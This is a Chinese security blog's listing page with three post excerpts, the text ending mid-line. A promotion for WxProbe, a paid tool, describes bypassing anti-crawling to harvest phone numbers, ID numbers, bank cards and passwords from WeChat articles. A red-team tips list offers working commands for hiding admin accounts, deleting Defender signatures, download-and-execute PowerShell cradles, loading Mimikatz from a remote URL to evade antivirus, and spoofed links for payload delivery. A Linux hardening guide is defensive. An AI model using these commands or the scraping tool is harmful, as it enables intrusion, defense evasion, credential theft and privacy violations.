首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,828 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
67
篇与
的结果
2026-05-13
WxProbe,一款自研的公众号敏感信息收集工具
此工具的灵感主要是源于一次北京红队金融项目,在公众号这块的信息收集实验比较少,要手动一个一个公众号去翻,特意写的一个工具这个工具主要用于敏感信息收集工具,专注于微信公众号文章批量获取与 AI 智能分析。通过 Token 登录微信公众平台,批量抓取指定公众号发布的历史文章,利用 DeepSeek AI 识别手机号、身份证、邮箱、车牌号、密码等等敏感信息。以及公司关联信息,公司注册资金、统一信用代码,法定代表人,股东结构等等信息(AI生成的结果,仅供参考)注:此工具仅限于学习使用,请勿用于非法用途,若造成不良后果,与工具开发者以及泷羽Sec安全团队无关,请自行承担相应的法律责任,此工具禁止逆向源码,一旦发现,后果自负,若需要源码二开,可以自行联系工具作者一次性买断(白菜价)。技术架构WxProbe ├── WeChatLogin # Token + Cookie 登录管理 ├── ArticleFetcher # 文章列表获取 + 正文抓取 │ ├── scrapling # headless 隐身模式(反爬) │ └── requests # 保底方案 ├── SensitiveInfoAnalyzer │ ├── _regex_scan # 正则快速扫描(手机号/身份证/邮箱/IP等) │ └── analyze_single # DeepSeek AI 深度分析 ├── WechatSogouAPI # 搜狗微信搜索(可选) └── ShadowEyeApp (UI) ├── 公众号情报 Tab ├── 搜狗搜索 Tab ├── URL 抓取 Tab └── 设置 / 导出 模块 功能 🔐 公众号情报 Token 一键登录 → 搜索公众号 → 多页爬取文章 → AI 分析 → 导出报告 🔎 搜狗搜索 无需登录,直接搜索微信文章 → 一键抓取 → AI 分析敏感信息 📎 URL 抓取 粘贴微信文章链接(单条/批量),抓取正文并用 AI 分析 🤖 AI 分析 DeepSeek + 正则双引擎:手机号、身份证、邮箱、IP、银行卡、密钥等 使用教程打开微信公众平台扫码登录登录后复制token复制cookie复制到这上面来输入之后就能登录成功尝试搜索公众号默认是五页选择自己要爬取的公众号后点击爬取刚开始是没有敏感信息的,需要手动点击是否进行AI分析,这里使用的AI是deepseek需要在系统设置,设置自己的apikey和模型名称AI分析完成后,可以在敏感信息中看到常见的手机号、身份证号、姓名、邮箱、地址、IP地址、银行卡号、网站链接/域名、密码/密钥/Token、组织机构代码、车牌号、QQ/微信号、其他PII等等,对于公司信息会调出企业工商信息,比如(注册资金,实缴资本、统一社会信用代码、注册时间等等工商信息,以及公司结构)这对于公众号这块的信息来讲是非常的有用的中国债卷尝试若您对结果不满意,可以导出功能,自行对数据进行分析2、信息收集部分,本工具已绕过搜狗反爬功能,您可以通过搜狗搜索引擎,搜索到微信公众号相关文章,利用AI进行敏感信息分析,和前面一样比如邮箱、手机号等等信息,为了稳定请不要频繁点击某一个功能,耐心等待工具执行(若数据量较大可能要等待10分钟、一小时),在此期间可以双击某一个文章查看文章详情注意:对于搜狗搜索引擎,单个文章建议请抓取一次即可,不要重复抓取,否则极易促发反爬。3、若您已经拥有了一定数量的公众号相关的URL,则可以使用URL抓取功能例如https://mp.weixin.qq.com/s/caVRY62bhNZm5Ri81oqUwghttps://mp.weixin.qq.com/s/hcB1m6tmDFfx9PA7rNzOZA注意:对于某号文章爬取,可全面绕过,稳定爬取,无需担心被拦截,但需要确保你已成功登录工具获取方式,扫描下方二维码加入freebuf知识大陆即可获取,仅需79此时加入,可获取香港免备案服务器一个月使用权(配置:4核心 4GB 硬盘:40G 带宽:10Mbps 峰值 流量:无流量限制),限时到2026年6月1日之前,之后不再赠送注:服务器使用需要实名,介意的话可以忽略赠品常见问题Q: 搜狗搜索提示验证码拦截? 先执行一次搜索(让系统建立 session),搜索成功后 session 会缓存,后续抓取会复用该 session。Q: URL 抓取按钮一直"分析中"? 需要先在「公众号情报」tab 完成登录。如果已登录仍卡住,可能是网络问题,2 分钟超时后会自动恢复。Q: 分析结果为空或"未获取到正文"? scrapling 可能被反爬。程序会自动降级到 requests + BeautifulSoup 保底方案。如仍失败,检查文章链接是否有效。
2026年05月13日
1,019 阅读
0 评论
1 点赞
2026-04-15
红队150+工具集RedTeam-Tools 使用教程
红队实战技巧向红队老手取经——这里收集了一堆红队实战技巧,覆盖了各种战术、工具和方法论,拿来就能提升你的红队水平。利用鼠标事件改进HTML走私'Qakbot在HTML走私附件里加了鼠标移动事件监听,沙箱里不挪鼠标压缩包就不弹出来。'利用谷歌翻译搞钓鱼钓鱼页面通过谷歌翻译的页面预览功能做代理转发,骗取受害者输入的凭据。隐藏本地管理员账户reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f'搞持久化创建账号容易被蓝队发现。但你可以用注册表里的小魔法把本地管理员账号藏起来。'删签名废掉Windows Defender"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'做法有点粗暴,但如果Windows Defender让你头疼得不行,别直接关(会弹告警),删掉签名文件就行。'开启多用户RDP会话reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f'有时候你想RDP登录一台机器,但那个用户已经有活动会话了。开启多用户会话就能解决。'Sysinternals PsExec的本地替代wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "'横向移动的时候还要上传Sysinternals PsExec.exe,烦不烦?Windows系统里自带了一个更好用的替代品。试试这个。'活在 Land 的端口扫描器0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null'能用系统自带就别往机器上扔工具(原因多了去了)。PowerShell和.NET都能帮上忙。比如这个用PowerShell写的简易端口扫描器。'感知代理的PowerShell下载$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")'现在大企业基本都架了Web代理,标准PowerShell下载摇篮不走代理,这个版本能感知代理。'从浏览器书签找内网端点type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"'光看用户的浏览器书签就能找到不少好东西,比如他们能访问的那些内部系统地址。'查DNS记录做信息收集Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>'信息收集占了95%的活。但疯狂扫环境动静太大,不如直接跟DC/DNS服务器要一份完整的DNS记录?'不用PowerUp查无引号服务路径Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name'不用PowerUp也能找到无引号服务路径'用/k绕过禁用的CMD# Win+R(调出运行框) cmd.exe /k "whoami"'管理员已禁用命令提示符...' 这种提示在Kiosk电脑之类的环境里挺常见。快速绕过的方法是通过Windows运行框加/k参数,命令照样执行,弹完限制提示也就完事了。'不让Defender删mimikatz.exe(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv'Windows Defender老删你mimikatz.exe,烦不烦?试试这个替代方案。'检测是否在虚拟机里reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"'想知道自己是不是在虚拟机里?查注册表就行了!!!只要搜出结果,就说明你在虚拟机里。'枚举AppLocker规则(Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\'AppLocker有时候挺烦人的,先枚举看看它到底有多烦。'用画图6像素搞出CMD快捷方式打开MSPAInt.exe,画布尺寸设为:宽=6像素,高=1像素放大画布,方便操作用取色器,从左到右依次设置每个像素的RGB值:1st: R: 10, G: 0, B: 02nd: R: 13, G: 10, B: 133rd: R: 100, G: 109, B: 994th: R: 120, G: 101, B: 465th: R: 0, G: 0, B: 1016th: R: 0, G: 0, B: 0保存为24位位图(.bmp;.dib)把扩展名从bmp改成bat,然后运行。'一种不太常见但很管用的拿shell方法——在微软画图里用特定颜色画几个像素,就能生成一个指向cmd.exe的快捷方式。BMP文件的编码算法有漏洞可钻,精心挑选RGB颜色值就能往文件里写入指定的ASCII数据。'PreventDefault JavaScript链接欺骗<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PreventDefault Example</title> </head> <body> <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a> </body> </html>已经有威胁行为者用这招来骗受害者点击伪造的恶意下载链接。利用JavaScript的PreventDefault方法,鼠标悬停时显示的是google.com这种正常链接,但一点下去就被重定向到攻击者的恶意链接bing.com。用来诱导受害者从你控制的站点下载payload相当好用。'用Responder测SMB防火墙规则Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"'做失陷评估的时候,我经常问客户能不能最后做个快速检查:Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"。要是Responder能抓到哈希,说明防火墙放行了出站SMB连接。''用SysInternals PsSuspend干AV用微软Sysinternals工具PsSuspend.exe可以挂起某些杀软的服务进程。这个微软签名工具接收PID或服务名,然后通过NtSuspendProcess这个Windows API把进程挂起。'侦察spiderfootSpiderFoot是一款开源情报(OSINT)自动化工具,几乎对接了市面上所有能用的数据源,还内置了多种数据分析方法,查出来的信息一目了然。SpiderFoot既可以进攻用(比如红队演练或渗透测试时做目标侦察),也可以防守用——看看你或你的组织在互联网上到底暴露了哪些东西。安装:wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt完整安装说明见这里。使用方法:Python3 ./sf.py -l 127.0.0.1:5001大量用法教程视频见这里reconftwreconFTW把整个信息收集流程全自动化了。子域名枚举、各种漏洞检查、目标信息最大化获取——一条龙搞定,效率远超手工操作。安装:Git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh完整安装说明见这里。使用方法:# 单目标域名 ./reconftw.sh -d target.com -r # 一个目标,多个域名 ./reconftw.sh -m target -l domAIns.txt -r # 被动侦察 ./reconftw.sh -d target.com -p # 执行所有检查和漏洞利用 ./reconftw.sh -d target.com -a完整使用说明见这里。subzy子域名接管检测工具,基于can-i-take-over-xyz的响应指纹匹配来工作。安装:go install -v Github.com/PentestPad/subzy@latest完整安装说明见这里。使用方法:# 子域名列表 ./subzy run --targets list.txt # 单个或多个目标 ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.comsmtp-user-enum通过VRFY、EXPN和RCPT命令枚举SMTP用户,内置了智能超时、重试和重连机制。安装:pip install smtp-user-enum使用方法:smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --versioncrt.sh -> httprobe -> EyeWitness我拼了一条bash命令,一条龙搞定:从证书透明度日志被动收集子域名列表(crt.sh)主动请求每个子域名验证存活(httprobe)给每个子域名截图供人工审查(EyeWitness)使用方法:domAIn=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; Python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web注意:需要安装httprobe、pup和EyeWitness,并把'DOMAIN_COM'改成目标域名。如果有多个目标根域名,可以在多个终端窗口并发跑。jsendpoints一个JavaScript书签工具,用于提取网页上所有的API端点链接。由@renniepak创建,这段JavaScript代码可以从当前网页DOM中提取所有端点(以/开头的路径),包括网页中嵌入的所有外部脚本资源。JavaScript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();用法(书签)创建一个书签……右键点击书签栏点击'添加页面'把上面的JavaScript粘贴到'网址'框里点击'保存'……然后浏览器访问目标页面,点击这个书签就行了。用法(控制台)把上面的JavaScript粘贴到控制台窗口(F12),回车执行。nuclei快速漏洞扫描器,使用.yaml模板来搜索特定类型的安全问题。安装:go install -v Github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest使用方法:cat domAIns.txt | nuclei -t /PATH/nuclei-templates/certSniffcertSniff是我用Python写的证书透明度日志关键词监控工具。它用certstream库来监控包含指定关键词的证书创建日志。设置好跟目标域名相关的关键词让它跑着,一旦有新证书创建就会被记录下来,说不定就能发现你之前不知道的子域名。安装:Git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt使用方法:Python3 certSniff.py -f example.txtgobuster对目标网站进行文件和目录路径爆破的好工具。安装:sudo apt install gobuster使用方法:gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20feroxbuster专为强制浏览(Forced Browsing)攻击设计的工具——目标是枚举和访问那些Web应用没有显式引用、但攻击者仍然能访问的资源。Feroxbuster用字典暴力搜索目标目录下未被链接的内容。这些资源里可能藏着Web应用和操作系统的敏感信息,比如源码、凭据、内网地址等等……安装(Kali):sudo apt update && sudo apt install -y feroxbuster安装:(Mac)curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash安装(Windows):Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V完整安装说明见这里。使用方法:# 为每个URL添加.pdf、.js、.html、.php、.txt、.json和.docx扩展名 ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # 带请求头扫描 ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # 从标准输入读取URL cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # 通过BurpSuite代理请求 ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080完整用法示例见[这里](https://epi052.github.io/feroxbuster-docs/docs/examples/)。 CloudBrute用来在主流云平台上(亚马逊、谷歌、微软、DiGitalOcean、
2026年04月15日
1,295 阅读
0 评论
0 点赞
2026-04-10
Linux 服务器如何进行安全加固?
前言Linux 服务器是企业业务的核心载体,从 Web 服务、数据库、中间件到容器集群,绝大多数生产业务都运行在 Linux 系统之上。而互联网暴露面扩大、供应链漏洞频发、定向攻击常态化,让 Linux 服务器成为黑客入侵的首要目标。安全加固的核心目标,是通过最小权限原则、纵深防御体系、持续审计机制,缩小服务器攻击面,阻断攻击路径,提升抗入侵能力 —— 即使边界防护被突破,也能最大程度保护核心数据与业务安全。本文覆盖从账号认证、服务最小化、权限管控到网络防护、日志审计、入侵检测的全维度落地方案,适配 CentOS 7/8/9、RHEL 7/8/9、Ubuntu 20.04/22.04/24.04 等主流企业级发行版,所有操作均配套明确的配置命令、验证方法与回滚方案,可直接落地到生产环境。一、前置核心加固原则所有加固操作需严格遵循以下原则,避免业务中断或防护失效:1、 最小权限原则:仅给用户、服务、进程分配完成任务所需的最小权限,杜绝过度授权2、 最小暴露原则:关闭所有非必要的端口、服务、组件,从根源缩小攻击面3、 纵深防御原则:构建账号、网络、文件、应用多层防护体系,避免单点防护失效4、 可回滚原则:修改配置前必须备份原文件,所有操作均配套回滚方法,避免生产故障5、 持续审计原则:加固不是一次性操作,需定期开展基线检查、漏洞扫描与日志审计,持续优化防护策略【生产环境避坑提示】所有涉及系统核心配置、SSH 服务、防火墙的修改,需先在测试环境验证,再逐步落地生产;修改 SSH 配置后,需先保留当前会话,用新会话测试登录正常后,再关闭原会话,避免服务器失联。二、账号与身份认证安全加固账号与认证是服务器安全的第一道防线,超过 70% 的 Linux 入侵事件,都源于弱口令、账号过度授权、SSH 配置缺陷导致的边界突破。2.1 清理无用账号,消除风险账户系统安装、业务迭代过程中会产生大量无用账号,包括默认创建的程序账号、废弃的运维账号,这些账号往往成为黑客入侵的突破口。# 1、备份原账号配置文件,方便回滚 cp /etc/passwd /etc/passwd.bak.$(date +%Y%m%d) cp /etc/shadow /etc/shadow.bak.$(date +%Y%m%d) # 2、查看系统中所有可登录的账号,排查废弃账号 cat /etc/passwd | grep -E "/bin/bash|/bin/sh|/bin/zsh" # 3、锁定无用账号(推荐,可恢复,比直接删除更安全) usermod -L 废弃用户名 # 解锁账号回滚命令:usermod -U 废弃用户名 # 4、禁用程序账号的登录权限,杜绝账号被滥用 usermod -s /sbin/nologin 程序用户名 # 示例:usermod -s /sbin/nologin apache 2.2 强制配置强密码策略弱口令是黑客暴力破解的首要目标,需通过 PAM 模块强制系统所有用户使用复杂度达标的密码,同时限制密码有效期与重试次数。适配 CentOS/RHEL 系列# 1、安装密码质量检测模块 yum install -y libpwquality # 2、修改密码策略配置文件,强制密码复杂度 vi /etc/security/pwquality.conf # 新增/修改以下配置: minlen = 12 # 密码最小长度12位 minclass = 3 # 必须包含大小写字母、数字、特殊符号中的3种 maxrepeat = 3 # 禁止连续3个相同字符 difok = 5 # 新密码与旧密码至少5个字符不同 enforce_for_root = 1 # 强制root用户也遵循该策略 # 3、配置密码登录失败锁定策略,防止暴力破解 vi /etc/pam.d/system-auth vi /etc/pam.d/password-auth # 在auth字段新增配置,连续5次失败锁定10分钟: auth required pam_fAIllock.so preauth audit silent deny=5 unlock_time=600 auth [default=die] pam_fAIllock.so authfAIl audit deny=5 unlock_time=600 auth sufficient pam_fAIllock.so authsucc audit 适配 Ubuntu/Debian 系列# 1、安装密码质量检测模块 apt install -y libpam-pwquality # 2、修改密码策略配置 vi /etc/pam.d/common-password # 修改pam_pwquality.so行,添加强制规则: password requisite pam_pwquality.so retry=3 minlen=12 minclass=3 maxrepeat=3 enforce_for_root # 3、配置登录失败锁定策略 vi /etc/pam.d/common-auth # 新增配置,连续5次失败锁定10分钟: auth required pam_fAIllock.so preauth audit silent deny=5 unlock_time=600 auth [default=die] pam_fAIllock.so authfAIl audit deny=5 unlock_time=600 auth sufficient pam_fAIllock.so authsucc audit 2.3 SSH 服务全维度安全加固SSH 是 Linux 远程管理的核心协议,也是黑客攻击的头号目标,需从认证方式、访问控制、端口配置等维度完成全量加固。# 1、备份SSH配置文件,方便回滚 cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak.$(date +%Y%m%d) # 2、修改SSH核心配置 vi /etc/ssh/sshd_config # 核心加固项如下: Port 22345 # 修改默认22端口,减少全网扫描攻击 PermitRootLogin no # 禁止root用户直接登录 PubkeyAuthentication yes # 开启公钥认证,优先使用密钥登录 PasswordAuthentication no # 关闭密码认证,彻底杜绝暴力破解 PermitEmptyPasswords no # 禁止空密码登录 MaxAuthTries 3 # 最大认证尝试次数3次 ClientAliveInterval 300 # 5分钟无操作自动断开连接 ClientAliveCountMax 2 # 无响应最大次数2次 AllowUsers 运维用户名@192.168.1.0/24 # 配置IP白名单,仅允许指定网段的指定用户登录 # 禁止使用不安全的加密算法与协议 KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256 Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com # 3、验证SSH配置语法是否正确,避免配置错误导致服务崩溃 sshd -t # 配置无报错后,重启SSH服务生效 # CentOS/RHEL:systemctl restart sshd # Ubuntu/Debian:systemctl restart ssh # 4、验证加固效果,用新会话测试登录,确认白名单、密钥认证正常生效 2.4 Sudo 提权权限精细化管控绝大多数提权攻击都利用了 sudo 的过度授权,需严格限制普通用户的 sudo 权限,杜绝直接给用户分配 ALL 权限。# 1、备份sudo配置文件 cp /etc/sudoers /etc/sudoers.bak.$(date +%Y%m%d) # 2、使用visudo命令编辑sudo配置(自带语法检查,避免配置错误) visudo # 错误配置(禁止使用):运维用户名 ALL=(ALL) ALL # 正确配置:仅给用户分配完成工作所需的最小命令权限,示例: 运维用户名 ALL=(ALL) /usr/bin/systemctl restart nginx, /usr/bin/tAIl -f /var/log/nginx/access.log # 禁止用户通过sudo修改sudo配置、切换root、执行高危命令 Defaults !visiblepw Defaults always_set_home Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin Defaults env_reset # 禁止sudo执行su、vim、bash等可直接提权的命令 运维用户名 ALL=(ALL) !/usr/bin/su, !/usr/bin/bash, !/usr/bin/vim /etc/sudoers, !/usr/bin/visudo 三、系统服务与组件最小化加固系统运行的服务越多,开放的端口与攻击面就越大,黑客可利用的漏洞点就越多。最小化加固的核心,是只保留业务必需的服务与组件,关闭所有非必要内容。3.1 关闭非必要服务,缩小攻击面# 1、查看系统当前运行的所有服务 systemctl list-units --type=service --state=running # 2、停止并禁用非必要服务,示例如下(根据业务实际情况调整) # 禁用打印服务 systemctl stop cups systemctl disable cups # 禁用蓝牙服务 systemctl stop bluetooth systemctl disable bluetooth # 禁用IPv6相关服务(业务不使用IPv6时) systemctl stop ip6tables systemctl disable ip6tables # 禁用rpcbind服务(不使用NFS共享时) systemctl stop rpcbind systemctl disable rpcbind # 3、验证服务状态,确认已停止并禁用 systemctl status cups 3.2 定时任务安全管控定时任务是黑客权限维持的常用载体,需严格管控定时任务的创建权限,定期排查异常任务。# 1、限制允许使用crontab的用户,仅白名单用户可创建定时任务 echo "root" > /etc/cron.allow echo "运维用户名" >> /etc/cron.allow # 不在cron.allow中的用户,一律禁止使用crontab # 2、定期排查所有定时任务,发现异常立即处置 # 查看系统级定时任务 ls -la /etc/cron.d/ /etc/cron.hourly/ /etc/cron.dAIly/ /etc/cron.weekly/ /etc/cron.monthly/ # 查看所有用户的定时任务 cat /etc/passwd | cut -f1 -d: | xargs -I {} crontab -l -u {} 2>/dev/null # 3、给定时任务配置文件添加不可变属性,防止黑客篡改 chattr +i /etc/crontab chattr +i /etc/cron.allow 3.3 软件包与仓库安全加固# 1、删除非官方、不可信的软件源,仅保留官方仓库 # CentOS/RHEL:查看仓库配置 ls /etc/yum.repos.d/ # Ubuntu/Debian:查看仓库配置 ls /etc/apt/sources.list.d/ # 2、配置官方源的HTTPS协议,防止源劫持 # Ubuntu/Debian示例: sed -i 's/http://https://g' /etc/apt/sources.list # 3、禁止内核版本自动更新,避免生产业务兼容性故障 # CentOS/RHEL:yum install -y yum-plugin-versionlock && yum versionlock kernel* # Ubuntu/Debian:apt-mark hold Linux-image-generic Linux-headers-generic # 4、定期清理无用的软件包与依赖,减少攻击面 # CentOS/RHEL:yum autoremove -y # Ubuntu/Debian:apt autoremove -y 四、文件系统与权限安全加固Linux 的一切皆文件,文件权限管控是系统安全的核心,黑客入侵后往往通过文件权限漏洞实现提权、持久化、数据窃取。4.1 关键系统文件权限严格管控# 1、核心账号配置文件权限加固 chmod 644 /etc/passwd chmod 600 /etc/shadow chmod 644 /etc/group chmod 600 /etc/gshadow chown root:root /etc/passwd /etc/shadow /etc/group /etc/gshadow # 2、SSH配置文件权限加固 chmod 700 /root/.ssh chmod 600 /root/.ssh/authorized_keys chown root:root /root/.ssh /root/.ssh/authorized_keys chmod 600 /etc/ssh/sshd_config chown root:root /etc/ssh/sshd_config # 3、sudo配置文件权限加固 chmod 440 /etc/sudoers chown root:root /etc/sudoers # 4、全局查找全局可写的危险文件,排查权限漏洞 find / -type f -perm -0002 ! -type l -ls 2>/dev/null # 全局查找SUID权限的可执行文件,排查提权风险点 find / -perm -4000 -type f -ls 2>/dev/null 4.2 敏感文件不可变属性锁定通过 chattr 命令给核心配置文件添加不可变属性,即使是 root 用户,也无法修改、删除文件,防止黑客篡改系统配置、植入后门。# 1、锁定核心账号配置文件,禁止账号新增、修改 chattr +i /etc/passwd /etc/shadow /etc/group /etc/gshadow # 2、锁定SSH与sudo配置文件,防止黑客修改认证规则 chattr +i /etc/ssh/sshd_config /etc/sudoers # 3、锁定定时任务配置,防止黑客植入持久化后门 chattr +i /etc/crontab # 4、查看文件的扩展属性,确认锁定生效 lsattr /etc/passwd # 回滚方法:如需修改文件,先解除锁定 chattr -i 文件名 4.3 分区挂载安全加固通过分区挂载参数,限制高危操作,防止缓冲区溢出、提权攻击,生产环境建议单独给 /boot、/home、/tmp、/var 分区,避免根目录占满导致业务故障,同时配置安全挂载参数。# 1、修改/etc/fstab文件,配置分区安全挂载参数 vi /etc/fstab # 核心加固参数示例: # /tmp分区:禁止SUID、禁止设备文件、禁止可执行程序、禁止强制访问控制 /dev/sdb1 /tmp ext4 defaults,noexec,nosuid,nodev 0 0 # /var分区:禁止SUID、禁止设备文件 /dev/sdb2 /var ext4 defaults,nosuid,nodev 0 0 # /home分区:禁止SUID、禁止设备文件 /dev/sdb3 /home ext4 defaults,nosuid,nodev 0 0 # 2、重新挂载分区,使配置生效 mount -o remount /tmp mount -o remount /var mount -o remount /home # 3、验证挂载参数是否生效 mount | grep /tmp 4.4 核心文件完整性监控部署文件完整性监控工具,实时检测核心文件的修改行为,一旦出现非计划内的变更,立即触发告警,第一时间发现黑客的篡改行为。# 1、安装AIDE文件完整性监控工具 # CentOS/RHEL:yum install -y aide # Ubuntu/Debian:apt install -y aide # 2、初始化AIDE数据库,生成系统文件基线 aide --init mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz # 3、执行完整性检查,对比基线发现文件变更 aide --check # 4、配置定时任务,每天凌晨自动执行检查,发送告警邮件 echo '0 0 * * * root /usr/sbin/aide --check | mail -s "服务器文件完整性告警" 运维邮箱地址' > /etc/cron.d/aide_check 五、网络与防火墙安全加固网络层是阻断外部攻击的关键屏障,通过防火墙、内核参数加固,过滤恶意流量,防止端口扫描、DDoS 攻击、内网横向渗透。5.1 防火墙规则精细化配置根据业务实际需求,配置白名单规则,仅开放业务必需的端口,默认拒绝所有其他访问,这是网络防护的核心原则。适配 CentOS/RHEL 系列(firewalld)# 1、启动firewalld服务并设置开机自启 systemctl start firewalld systemctl enable firewalld # 2、配置默认规则:默认拒绝所有入站流量,允许所有出站流量 firewall-cmd --set-default-zone=drop firewall-cmd --permanent --zone=drop --set-target=DROP # 3、仅开放业务必需的端口,示例: # 开放自定义SSH端口22345,仅允许内网网段访问 firewall-cmd --permanent --zone=drop --add-rich-rule='rule family="ipv4" source address="192.168.1.0/24" port protocol="tcp" port="22345" accept' # 开放Web服务80、443端口,允许全网访问 firewall-cmd --permanent --zone=drop --add-port=80/tcp firewall-cmd --permanent --zone=drop --add-port=443/tcp # 开放数据库3306端口,仅允许业务服务器IP访问 firewall-cmd --permanent --zone=drop --add-rich-rule='rule family="ipv4" source address="172.16.1.10/32" port protocol="tcp" port="3306" accept' # 4、重载防火墙规则,使配置生效 firewall-cmd --reload # 5、验证防火墙规则是否生效 firewall-cmd --list-all 适配 Ubuntu/Debian 系列(ufw)# 1、安装并启动ufw防火墙 apt install -y ufw systemctl start ufw systemctl enable ufw # 2、配置默认规则 ufw default deny incoming ufw default allow outgoing # 3、开放业务必需的端口,示例: # 自定义SSH端口22345,仅允许内网网段访问 ufw allow from 192.168.1.0/24 to any port 22345 proto tcp # 开放Web服务80、443端口 ufw allow 80/tcp ufw allow 443/tcp # 开放数据库3306端口,仅允许业务服务器访问 ufw allow from 172.16.1.10/32 to any port 3306 proto tcp # 4、启用防火墙并验证规则 ufw enable ufw status verbose 5.2 内核网络参数安全加固通过修改 /etc/sysctl.conf 内核参数,开启系统自带的网络防护能力,抵御 SYN 洪水、IP 欺骗、ICMP 攻击等常见网络攻击。# 1、备份sysctl配置文件 cp /etc/sysctl.conf /etc/sysctl.conf.bak.$(date +%Y%m%d) # 2、修改内核参数配置 vi /etc/sysctl.conf # 新增/修改以下核心加固配置: # 开启SYN Cookies,抵御SYN洪水攻击 net.ipv4.tcp_syncookies = 1 # 禁用IP源路由,防止IP欺骗 net.ipv4.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 # 禁用ICMP重定向,防止路由劫持 net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 0 net.ipv4.conf.default.secure_redirects = 0 # 开启反向路径过滤,防止IP地址欺骗 net.ipv4.conf.all.rp_filter = 1 net.ipv4.conf.default.rp_filter = 1 # 禁用IP转发,非网关服务器必须关闭 net.ipv4.ip_forward = 0 net.ipv6.conf.all.forwarding = 0 # 忽略广播ICMP请求,防止Smurf攻击 net.ipv4.icmp_echo_ignore_broadcasts = 1 # 忽略所有ICMP请求,业务不需要时开启 # net.ipv4.icmp_echo_ignore_all = 1 # 开启TCP洪水攻击防护 net.ipv4.tcp_synack_retries = 2 net.ipv4.tcp_syn_retries = 2 # 